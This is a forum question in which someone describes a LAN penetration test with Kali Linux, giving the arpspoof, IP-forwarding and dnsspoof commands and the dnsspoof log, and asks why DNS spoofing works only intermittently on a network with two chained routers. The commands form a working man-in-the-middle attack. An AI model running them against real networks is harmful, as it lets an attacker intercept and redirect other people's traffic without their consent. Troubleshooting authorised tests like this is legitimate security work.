Kali DnsSpoof in a weird network

[kdlsw]

Hi, I did a pentest in a LAN, some weird things happened.

This LAN is a little unusual, there are two routers, say A and B, A is directly connected to an optical fiber, doing PPPoE, to the WAN, it has a gateway of 192.168.1.1, B is connected to A, wireless router, with a gateway of 192.168.0.1. All the clients and my Kali machine are connected to B. Target has an IP of 192.168.0.104

Here is what I did with Kali, I use the following to arp spoof the target and router B 

arpsoof  -i  eth0  -t  192.168.0.1  192.168.0.104
arpsoof  -i  eth0  -t  192.168.0.104  192.168.0.1
sysctl -w net.ipv4.ip_forward=1

Then I did a Dns Spoof with

dnsspoof  -i  eth0  -f  dnshost.spoof

It did not work, all the traffic went through my Kali, but the target was still able to access the original webpage.

And here comes the weird thing. I stopped the dnsspoof, stopped the ip forwarding

sysctl -w  net.ipv4.ip_forward=0

and I started the exactly the same exact dnsspoof as last time again, it worked!

This really confused me, because after that, I tried to start arpspoof and dnsspoof without setting ip_forward to 1 at all, I left it to be the default 0, and it did not work, because the arp traffic was not working (which is excepted!!). ArpSpoof and dnsspoof both work ONLY IF the process "ip forwarding is firstly enabled and then disabled" completed once, before launching dnsspoof. Ip forwarding only on gives dnsspoof not working, ip forwarding only always off gives arpspoof not working.

Besides that, two more strange things I failed to understand.

1, Sometimes, the "ip forward on and off" cycle must be done in the same terminal where the dnsspoof takes place, in order to make it work. Switching on then off in another terminal simply leads to arpspoof failure.

2, Here is the log/feedback of a DnsSpoof

root@kali:~# dnsspoof -i eth0 -f dnshost.spoof 
dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.0.113]
192.168.0.104.62290 > 192.168.1.1.53:  4678+ A? www.youtube.com
192.168.0.104.62290 > 192.168.0.1.53:  4678+ A? www.youtube.com
192.168.0.104.65063 > 192.168.1.1.53:  31827+ A? www.youtube.com
192.168.0.104.65063 > 192.168.0.1.53:  31827+ A? www.youtube.com
192.168.0.104.55426 > 192.168.1.1.53:  51608+ A? www.sina.com
192.168.0.104.55426 > 192.168.0.1.53:  51608+ A? www.sina.com
192.168.0.104.54794 > 192.168.1.1.53:  5651+ A? www.sina.com
192.168.0.104.54794 > 192.168.0.1.53:  5651+ A? www.sina.com
192.168.0.104.60485 > 192.168.1.1.53:  2950+ A? www.sina.com
192.168.0.104.63394 > 192.168.1.1.53:  41196+ A? www.facebook.com
192.168.0.104.63394 > 192.168.0.1.53:  41196+ A? www.facebook.com
192.168.0.104.52953 > 192.168.1.1.53:  6912+ A? www.facebook.com
192.168.0.104.52953 > 192.168.0.1.53:  6912+ A? www.facebook.com
^Croot@kali:~# dnsspoof -i eth0 -f dnshost.spoof 
dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.0.113]
192.168.0.104.53807 > 192.168.1.1.53:  60485+ A? www.youtube.com
192.168.0.104.53807 > 192.168.1.1.53:  60485+ A? www.youtube.com
192.168.0.104.50239 > 192.168.1.1.53:  28894+ A? www.sina.com
192.168.0.104.50239 > 192.168.1.1.53:  28894+ A? www.sina.com

The second launch was a failed one, the first one succeeded. The router I am targeting should be 192.168.0.1, as the router B, in the second launch, it is interacting with only router A (192.168.1.1), I am not sure what does that mean and if it has something to do with the failure directly, because in the next few attempts, a feedback situation like this second launch worked sometimes.

 

I am almost 100% sure this issue was due to the two routers, but I am still not able to understand why, or even find a way to make it always work. Please, any suggestion will be appreciated! Thanks